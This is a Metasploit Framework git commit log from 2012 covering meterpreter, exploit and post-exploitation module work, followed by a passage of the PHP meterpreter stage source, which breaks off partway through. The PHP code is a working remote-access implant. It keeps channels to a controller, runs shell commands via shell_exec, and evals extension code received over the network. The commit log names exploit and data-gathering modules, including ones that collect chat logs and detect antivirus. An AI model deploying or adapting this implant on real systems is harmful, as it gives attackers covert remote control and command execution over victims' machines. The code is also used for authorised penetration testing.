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commit 6a3ad1d887
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:49 2012 -0600

    Add register_command calls for md5 and sha1

commit dbd52c5a1e
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:09 2012 -0600

    Read the file instead of downloading it

commit 55b84ad8e2
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 15:27:11 2012 -0600

    Re-compile linux meterp to support the loadlib api

commit d112e84e49
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:50:25 2012 -0600

    Re-compile java meterp to support the loadlib api

commit c137187b34
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:44:10 2012 -0600

    Don't try to get interfaces if this session doesn't implement it

commit 88bba1e6c3
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:38:17 2012 -0600

    Remove debugging load

commit 02954cbf93
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 12:06:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.php
    	modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

commit d9ef2569b8
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 2 18:06:06 2012 -0600

    PHP doesn't support rev2self

commit bf13ea0ff2
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 18:21:59 2012 -0600

    Add php support for returning new extension commands

commit 7e35f2d671
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 16:03:26 2012 -0600

    Reset CVE-2012-0507 back to master

    Purges commits unrelated to this branch.

commit 86a77b3cd0
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:59:35 2012 -0600

    Revert "Make building the jar for cve-2012-0507 a bit easier"

    This reverts commit 27ef76522a.

    Conflicts:

    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java

commit 8c259fb779
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:35:44 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.jar
    	data/meterpreter/meterpreter.jar
    	external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
    	modules/auxiliary/server/browser_autopwn.rb

commit fe2c273a6d
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Apr 6 10:19:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

commit 8caff47d97
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:51:18 2012 -0600

    Fix requires to find the test library

commit 51c33574ce
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:48:35 2012 -0600

    Fix a load order problem with solaris post mods

commit 81b658362e
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:43:19 2012 -0600

    Merge branch 'master' into feature/4905

commit 6ef4257947
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:16:56 2012 -0600

    Merge branch 'rapid7'

    Conflicts:
    	lib/rex/exploitation/javascriptosdetect.rb

commit adad2cf04c
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 4f8a437b49
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 27ef76522a
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit db3dbad0a5
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 776976af31
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit a611ab16e0
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 5114d35de7
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 748309465a
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 954d485e3b
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.

commit cba8d7c911
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 18:04:50 2012 -0600

    Linux doesn't implement (drop|steal)_token

commit 1cfda3a7b0
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 17:57:37 2012 -0600

    Add availability checks for net, sys, ui, and webcam

commit 4bdf39a8bf
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 16:45:59 2012 -0600

    add requirement checking for fs and core commands

commit 42e35971c9
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:59 2012 -0600

    Add a to_octal method that converts e.g. "A" to \0101

commit c3b9415a0a
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:07 2012 -0600

    Don't use "echo -n"

    It's not portable

commit b0f3ceccfa
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 17:01:10 2012 -0600

    Return a list of new commands after core_loadlib, java version

    Thanks mihi for the patch and the awesome responsiveness!

commit d65303e1b6
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 13:21:06 2012 -0600

    Make sure we have a response before doing stuff with it

commit 721001ead4
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 21:25:31 2012 -0600

    Add missing rmdir and mkdir protocol commands to PHP

    Now passes all the stdapi tests that it can
    	[*] Session type is meterpreter and platform is php/php
    	[+] should return a user id
    	[+] should return a sysinfo Hash
    	[-] FAILED: should return network interfaces
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should have an interface that matches session_host
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should return network routes
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
    	[+] should return the proper directory separator
    	[+] should return the current working directory
    	[+] should list files in the current directory
    	[+] should stat a directory
    	[+] should create and remove a dir
    	[+] should change directories
    	[+] should create and remove files
    	[+] should upload a file
    	[-] Passed: 10; Failed: 3

commit 024e99167a
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:26:00 2012 -0600

    Use a proper TLV type instead of a generic one

commit 1836d915cb
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:24:25 2012 -0600

    Fix a counting error that caused segfaults (Linux)

commit 1e419d3fc3
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:06:02 2012 -0600

    Return a list of new commands after core_loadlib

    Gets Windows back in sync with Linux

commit 3d3959f720
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 14:50:55 2012 -0600

    Refactor extensionList -> extension_commands

    It's not the same as extension_list.

commit a7acb638af
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sun Mar 18 00:07:27 2012 -0500

    Massive whitespace cleanup

commit ef8b9fd5ce
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 16:00:20 2012 -0500

    Add back enum_protections with some new changes

commit d778eec369
Author: ohdae <bindshell@live.com>
Date:   Sat Mar 17 13:28:31 2012 -0400

    Added fix for enum_protections

commit 64611819d4
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 03:14:26 2012 -0500

    A bunch of fixes

commit bb1a0205d7
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:28:05 2012 -0500

    The comments in get_chatlogs need an update

commit 666477e42a
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:25:41 2012 -0500

    Correct license format

commit 3c8eecbcd7
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:22:03 2012 -0500

    Add enum_adium.rb post module

commit d290cf4fef
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 16:54:36 2012 -0300

    Changed store_note to store_loot. Fixed local/remote file retrieval

commit ccb830b594
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 11:29:07 2012 -0600

    Fall back to MIB method if we can't get netmasks

    Misses IPv6 addresses, but at least doesn't break everything.

    [Fixes #6525]

commit a9a30232dd
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Fri Mar 16 11:49:31 2012 -0500

    This module is not ready, yanked.

commit 6bb34f7fd0
Author: Gregory Man <man.gregory@gmail.com>
Date:   Fri Mar 16 18:09:08 2012 +0200

    sockso_traversal 1.8 compatibility fix

commit e76965ce56
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:17:35 2012 -0400

    fix

commit 61ce7b587d
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:14:48 2012 -0400

    saves each config to loot instead of notes

commit f4713974fa
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 03:46:10 2012 -0600

    Check for a 0 prefix length

    If the OnLinkPrefixLength is 0, something is wrong, try the value in the
    prefix linked list.  Appears to fix v4 addresses on XP but not 2k3.

    [See #6525]

commit cde7fcc012
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 01:46:41 2012 -0600

    Return network prefixes when available

    Solves #6525 on Vista+.  Win2k still works using the old MIB method
    (which doesn't support ipv6).  Win2k3 and XP are still busted for
    unknown reasons.

commit 98bd9a7bd0
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 22:59:42 2012 -0400

    Enumerate important and interesting configuration files

commit 9336df2ac2
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 19:06:48 2012 -0500

    More Virtualisation SSL fixes

commit f24c378281
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 18:15:29 2012 -0500

    Default SSL to true for esx_fingerprint module

commit d6e14c4212
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:56:24 2012 -0500

    Fix typo

commit b24dcfe43e
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:55:54 2012 -0500

    Add sockso dir traversal

commit 033052c1e0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 15 14:31:25 2012 -0600

    Fix syntax error in 1.8, thanks Jun Koi for the patch

commit 4529efaeaa
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:27:40 2012 -0500

    enum_protections is now find_apps

commit 49e823802b
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:22:23 2012 -0500

    File rename, as well as design and cosmetic changes

commit ccf6b01114
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 15:29:52 2012 -0300

    added report_note, removed store_loot function, cleaned up info/author

commit 27d571932e
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 12:18:29 2012 -0300

    fixed output newline issue

commit 5a828e35d1
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:05:35 2012 -0300

    fixed save line

commit 805c2ee987
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:02:07 2012 -0300

    removed unneeded comments

commit 5861e1512f
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:00:55 2012 -0300

    fixed output issue

commit 593a364811
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 18:26:53 2012 -0300

    removed unneeded dependency

commit 05053e6e74
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 13:30:16 2012 -0400

    locates installed 3rd part av, fws, etc

commit 5bf512d0e9
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Wed Mar 14 16:50:54 2012 -0500

    Add OSVDB-79863 NetDecision Directory Traversal

commit 18715d0367
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 23:03:01 2012 -0600

    Store the retrieved commands on the session

commit b752cb8b31
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:45:16 2012 -0600

    Retrieve the list of new commands

    The client side doesn't do anything with them yet

commit 69ce8ef42d
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:41:16 2012 -0600

    Return a list of the new commands in response to core_loadlib

    Linux

commit 354c754aa4
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 15:13:45 2012 -0600

    Whitespace at EOL

commit 4afcb4cb9d
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 14:30:09 2012 -0600

    Create instance methods that return extensions

    Before this change, meterpreter sessions would not #respond_to? their
    extensions despite having a pseudo-accessor for them:
    ```
    >> client.respond_to? :sys
    => false
    >> client.sys
    => #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>

    ```

    After:
    ```
    >> client.respond_to? :sys
    => true
    ```

commit 70ab8c018f
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date:   Tue Apr 3 11:46:25 2012 -0600

    Merge branch 'master' into bap-refactor

    Conflicts:
    	external/source/exploits/CVE-2012-0507/Help.java
    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/msf/x/Help.java
    	external/source/exploits/CVE-2012-0507/src/a/Exploit.java
    	external/source/exploits/CVE-2012-0507/src/a/Help.java

commit a8a3938915
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 5e5eb39d3c
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 5074eadbea
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit bdb3fbe7fd
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 78824ef600
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:24:33 2012 -0600

    Add the detected browser version to the DOM

    Doing it this way lets modules grab the info a bit more easily.

commit 9813ccb8d6
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:19:05 2012 -0600

    Merge branch 'master' into bap-refactor

commit 0faa3f6524
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit 66ca27f994
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 7fc2ca1a06
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:10:54 2012 -0600

    Merge branch 'master' into bap-refactor

commit 325d306059
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 4f2b3260bf
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 9b905c53b4
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 17:00:02 -06:00

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#<?php
# Everything that needs to be global has to be made so explicitly so we can run
# inside a call to create_user_func($user_input);
# global list of channels
if (!isset($GLOBALS['channels'])) {
$GLOBALS['channels'] = array();
}
# global mapping of channels to channelized processes. This is how we know
# if we need to kill a process when it's channel has been closed.
if (!isset($GLOBALS['channel_process_map'])) {
$GLOBALS['channel_process_map'] = array();
}
# global resource map. This is how we know whether to use socket or stream
# functions on a channel.
if (!isset($GLOBALS['resource_type_map'])) {
$GLOBALS['resource_type_map'] = array();
}
# global map of sockets to the associated peer host.
if (!isset($GLOBALS['udp_host_map'])) {
$GLOBALS['udp_host_map'] = array();
}
# global list of resources we need to watch in the main select loop
if (!isset($GLOBALS['readers'])) {
$GLOBALS['readers'] = array();
}
# global list of extension commands
if (!isset($GLOBALS['commands'])) {
$GLOBALS['commands'] = array("core_loadlib");
}
function register_command($c) {
global $commands;
if (! in_array($c, $commands)) {
array_push($commands, $c);
}
}
function my_print($str) {
#error_log($str);
}
my_print("Evaling main meterpreter stage");
# Be very careful not to put a # anywhere that isn't a comment (e.g. inside a
# string) as the comment remover will completely break this payload
function dump_array($arr, $name=null) {
if (is_null($name)) {
$name = "Array";
}
my_print(sprintf("$name (%s)", count($arr)));
foreach ($arr as $key => $val) {
if (is_array($val)) {
# recurse
dump_array($val, "{$name}[{$key}]");
} else {
my_print(sprintf(" $key ($val)"));
}
}
}
function dump_readers() {
global $readers;
dump_array($readers, 'Readers');
}
function dump_resource_map() {
global $resource_type_map;
dump_array($resource_type_map, 'Resource map');
}
function dump_channels($extra="") {
global $channels;
dump_array($channels, 'Channels '.$extra);
}
# Doesn't exist before php 4.3
if (!function_exists("file_get_contents")) {
function file_get_contents($file) {
$f = @fopen($file,"rb");
$contents = false;
if ($f) {
do { $contents .= fgets($f); } while (!feof($f));
}
fclose($f);
return $contents;
}
}
# Renamed in php 4.3
if (!function_exists('socket_set_option')) {
function socket_set_option($sock, $type, $opt, $value) {
socket_setopt($sock, $type, $opt, $value);
}
}
#
# Constants
#
define("PACKET_TYPE_REQUEST",0);
define("PACKET_TYPE_RESPONSE",1);
define("PACKET_TYPE_PLAIN_REQUEST", 10);
define("PACKET_TYPE_PLAIN_RESPONSE", 11);
define("ERROR_SUCCESS",0);
# not defined in original C implementation
define("ERROR_FAILURE",1);
define("CHANNEL_CLASS_BUFFERED", 0);
define("CHANNEL_CLASS_STREAM", 1);
define("CHANNEL_CLASS_DATAGRAM", 2);
define("CHANNEL_CLASS_POOL", 3);
#
# TLV Meta Types
#
define("TLV_META_TYPE_NONE", ( 0 ));
define("TLV_META_TYPE_STRING", (1 << 16));
define("TLV_META_TYPE_UINT", (1 << 17));
define("TLV_META_TYPE_RAW", (1 << 18));
define("TLV_META_TYPE_BOOL", (1 << 19));
define("TLV_META_TYPE_COMPRESSED", (1 << 29));
define("TLV_META_TYPE_GROUP", (1 << 30));
define("TLV_META_TYPE_COMPLEX", (1 << 31));
# not defined in original
define("TLV_META_TYPE_MASK", (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16));
#
# TLV base starting points
#
define("TLV_RESERVED", 0);
define("TLV_EXTENSIONS", 20000);
define("TLV_USER", 40000);
define("TLV_TEMP", 60000);
#
# TLV Specific Types
#
define("TLV_TYPE_ANY", TLV_META_TYPE_NONE | 0);
define("TLV_TYPE_METHOD", TLV_META_TYPE_STRING | 1);
define("TLV_TYPE_REQUEST_ID", TLV_META_TYPE_STRING | 2);
define("TLV_TYPE_EXCEPTION", TLV_META_TYPE_GROUP | 3);
define("TLV_TYPE_RESULT", TLV_META_TYPE_UINT | 4);
define("TLV_TYPE_STRING", TLV_META_TYPE_STRING | 10);
define("TLV_TYPE_UINT", TLV_META_TYPE_UINT | 11);
define("TLV_TYPE_BOOL", TLV_META_TYPE_BOOL | 12);
define("TLV_TYPE_LENGTH", TLV_META_TYPE_UINT | 25);
define("TLV_TYPE_DATA", TLV_META_TYPE_RAW | 26);
define("TLV_TYPE_FLAGS", TLV_META_TYPE_UINT | 27);
define("TLV_TYPE_CHANNEL_ID", TLV_META_TYPE_UINT | 50);
define("TLV_TYPE_CHANNEL_TYPE", TLV_META_TYPE_STRING | 51);
define("TLV_TYPE_CHANNEL_DATA", TLV_META_TYPE_RAW | 52);
define("TLV_TYPE_CHANNEL_DATA_GROUP", TLV_META_TYPE_GROUP | 53);
define("TLV_TYPE_CHANNEL_CLASS", TLV_META_TYPE_UINT | 54);
define("TLV_TYPE_SEEK_WHENCE", TLV_META_TYPE_UINT | 70);
define("TLV_TYPE_SEEK_OFFSET", TLV_META_TYPE_UINT | 71);
define("TLV_TYPE_SEEK_POS", TLV_META_TYPE_UINT | 72);
define("TLV_TYPE_EXCEPTION_CODE", TLV_META_TYPE_UINT | 300);
define("TLV_TYPE_EXCEPTION_STRING", TLV_META_TYPE_STRING | 301);
define("TLV_TYPE_LIBRARY_PATH", TLV_META_TYPE_STRING | 400);
define("TLV_TYPE_TARGET_PATH", TLV_META_TYPE_STRING | 401);
define("TLV_TYPE_MIGRATE_PID", TLV_META_TYPE_UINT | 402);
define("TLV_TYPE_MIGRATE_LEN", TLV_META_TYPE_UINT | 403);
define("TLV_TYPE_CIPHER_NAME", TLV_META_TYPE_STRING | 500);
define("TLV_TYPE_CIPHER_PARAMETERS", TLV_META_TYPE_GROUP | 501);
function my_cmd($cmd) {
return shell_exec($cmd);
}
function is_windows() {
return (strtoupper(substr(PHP_OS,0,3)) == "WIN");
}
##
# Worker functions
##
function core_channel_open($req, &$pkt) {
$type_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_TYPE);
my_print("Client wants a ". $type_tlv['value'] ." channel, i'll see what i can do");
# Doing it this way allows extensions to create new channel types without
# needing to modify the core code.
$handler = "channel_create_". $type_tlv['value'];
if ($type_tlv['value'] && is_callable($handler)) {
my_print("Calling {$handler}");
$ret = $handler($req, $pkt);
} else {
my_print("I don't know how to make a ". $type_tlv['value'] ." channel. =(");
$ret = ERROR_FAILURE;
}
return $ret;
}
# Works for streams
function core_channel_eof($req, &$pkt) {
my_print("doing channel eof");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$c = get_channel_by_id($chan_tlv['value']);
if ($c) {
if (eof($c[1])) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_BOOL, 1));
} else {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_BOOL, 0));
}
return ERROR_SUCCESS;
} else {
return ERROR_FAILURE;
}
}
# Works
function core_channel_read($req, &$pkt) {
my_print("doing channel read");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$len_tlv = packet_get_tlv($req, TLV_TYPE_LENGTH);
$id = $chan_tlv['value'];
$len = $len_tlv['value'];
$data = channel_read($id, $len);
if ($data === false) {
$res = ERROR_FAILURE;
} else {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_DATA, $data));
$res = ERROR_SUCCESS;
}
return $res;
}
# Works
function core_channel_write($req, &$pkt) {
#my_print("doing channel write");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$data_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_DATA);
$len_tlv = packet_get_tlv($req, TLV_TYPE_LENGTH);
$id = $chan_tlv['value'];
$data = $data_tlv['value'];
$len = $len_tlv['value'];
$wrote = channel_write($id, $data, $len);
if ($wrote === false) {
return ERROR_FAILURE;
} else {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, $wrote));
return ERROR_SUCCESS;
}
}
#
# This is called when the client wants to close a channel explicitly. Not to be confused with
#
function core_channel_close($req, &$pkt) {
global $channel_process_map;
# XXX remove the closed channel from $readers
my_print("doing channel close");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$id = $chan_tlv['value'];
$c = get_channel_by_id($id);
if ($c) {
# We found a channel, close its stdin/stdout/stderr
channel_close_handles($id);
# This is an explicit close from the client, always remove it from the
# list, even if it has data.
channel_remove($id);
# if the channel we're closing is associated with a process, kill the
# process
# Make sure the stdapi function for closing a process handle is
# available before trying to clean up
if (array_key_exists($id, $channel_process_map) and is_callable('close_process')) {
close_process($channel_process_map[$id]);
}
return ERROR_SUCCESS;
}
dump_channels("after close");
return ERROR_FAILURE;
}
#
# Destroy a channel and all associated handles.
#
function channel_close_handles($cid) {
global $channels;
# Sanity check - make sure a channel with the given cid exists
if (!array_key_exists($cid, $channels)) {
return;
}
$c = $channels[$cid];
for($i = 0; $i < 3; $i++) {
#my_print("closing channel fd $i, {$c[$i]}");
if (array_key_exists($i, $c) && is_resource($c[$i])) {
close($c[$i]);
# Make sure the main loop doesn't select on this resource after we
# close it.
remove_reader($c[$i]);
}
}
# axe it from the list only if it doesn't have any leftover data
if (strlen($c['data']) == 0) {
channel_remove($cid);
}
}
function channel_remove($cid) {
global $channels;
unset($channels[$cid]);
}
function core_channel_interact($req, &$pkt) {
global $readers;
my_print("doing channel interact");
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$id = $chan_tlv['value'];
# True means start interacting, False means stop
$toggle_tlv = packet_get_tlv($req, TLV_TYPE_BOOL);
$c = get_channel_by_id($id);
if ($c) {
if ($toggle_tlv['value']) {
# Start interacting. If we're already interacting with this
# channel, it's an error and we should return failure.
if (!in_array($c[1], $readers)) {
# stdout
add_reader($c[1]);
# Make sure we don't add the same resource twice in the case
# that stdin == stderr
if (array_key_exists(2, $c) && $c[1] != $c[2]) {
# stderr
add_reader($c[2]);
}
$ret = ERROR_SUCCESS;
} else {
# Already interacting
$ret = ERROR_FAILURE;
}
} else {
# Stop interacting. If we're not interacting yet with this
# channel, it's an error and we should return failure.
if (in_array($c[1], $readers)) {
remove_reader($c[1]); # stdout
remove_reader($c[2]); # stderr
$ret = ERROR_SUCCESS;
} else {
# Not interacting. This is technically failure, but it seems
# the client sends us two of these requests in quick succession
# causing the second one to always return failure. When that
# happens we fail to clean up properly, so always return
# success here.
$ret = ERROR_SUCCESS;
}
}
} else {
# Not a valid channel
my_print("Trying to interact with an invalid channel");
$ret = ERROR_FAILURE;
}
return $ret;
}
function interacting($cid) {
global $readers;
$c = get_channel_by_id($cid);
if (in_array($c[1], $readers)) {
return true;
}
return false;
}
function core_shutdown($req, &$pkt) {
my_print("doing core shutdown");
die();
}
# zlib support is not compiled in by default, so this makes sure the library
# isn't compressed before eval'ing it
# TODO: check for zlib support and decompress if possible
function core_loadlib($req, &$pkt) {
global $commands;
my_print("doing core_loadlib");
$data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
return ERROR_FAILURE;
}
$tmp = $commands;
eval($data_tlv['value']);
$new = array_diff($commands, $tmp);
foreach ($new as $meth) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
}
return ERROR_SUCCESS;
}
##
# Channel Helper Functions
##
$channels = array();
function register_channel($in, $out=null, $err=null) {
global $channels;
if ($out == null) { $out = $in; }
if ($err == null) { $err = $out; }
$channels[] = array(0 => $in, 1 => $out, 2 => $err, 'type' => get_rtype($in), 'data' => '');
# Grab the last index and use it as the new ID.
$id = end(array_keys($channels));
my_print("Created new channel $in, with id $id");
return $id;
}
#
# Channels look like this:
#
# Array
# (
# [0] => Array
# (
# [0] => Resource id #12
# [1] => Resource id #13
# [2] => Resource id #14
# [type] => 'stream'
# [data] => '...'
# )
# )
#
function get_channel_id_from_resource($resource) {
global $channels;
if (empty($channels)) {
return false;
}
foreach ($channels as $i => $chan_ary) {
if (in_array($resource, $chan_ary)) {
my_print("Found channel id $i");
return $i;
}
}
return false;
}
function get_channel_by_id($chan_id) {
global $channels;
my_print("Looking up channel id $chan_id");
#dump_channels("in get_channel_by_id");
if (array_key_exists($chan_id, $channels)) {
my_print("Found one");
return $channels[$chan_id];
} else {
return false;
}
}
# Write data to the channel's stdin
function channel_write($chan_id, $data) {
$c = get_channel_by_id($chan_id);
if ($c && is_resource($c[0])) {
my_print("---Writing '$data' to channel $chan_id");
return write($c[0], $data);
} else {
return false;
}
}
# Read from the channel's stdout
function channel_read($chan_id, $len) {
$c = get_channel_by_id($chan_id);
if ($c) {
# First get any pending unread data from a previous read
$ret = substr($c['data'], 0, $len);
$c['data'] = substr($c['data'], $len);
if (strlen($ret) > 0) { my_print("Had some leftovers: '$ret'"); }
# Next grab stderr if we have it and it's not the same file descriptor
# as stdout.
if (strlen($ret) < $len and is_resource($c[2]) and $c[1] != $c[2]) {
# Read as much as possible into the channel's data buffer
$read = read($c[2]);
$c['data'] .= $read;
# Now slice out however much the client asked for. If there's any
# left over, they'll get it next time. If it doesn't add up to
# what they requested, oh well, they'll just have to call read
# again. Looping until we get the requested number of bytes is
# inconsistent with win32 meterpreter and causes the whole php
# process to block waiting on input.
$bytes_needed = $len - strlen($ret);
$ret .= substr($c['data'], 0, $bytes_needed);
$c['data'] = substr($c['data'], $bytes_needed);
}
# Then if there's still room, grab stdout
if (strlen($ret) < $len and is_resource($c[1])) {
# Same as above, but for stdout. This will overwrite a false
# return value from reading stderr but the two should generally
# EOF at the same time, so it should be fine.
$read = read($c[1]);
$c['data'] .= $read;
$bytes_needed = $len - strlen($ret);
$ret .= substr($c['data'], 0, $bytes_needed);
$c['data'] = substr($c['data'], $bytes_needed);
}
# In the event of one or the other of the above read()s returning
# false, make sure we have sent any pending unread data before saying
# EOF by returning false. Note that if they didn't return false, it is
# perfectly legitimate to return an empty string which just means
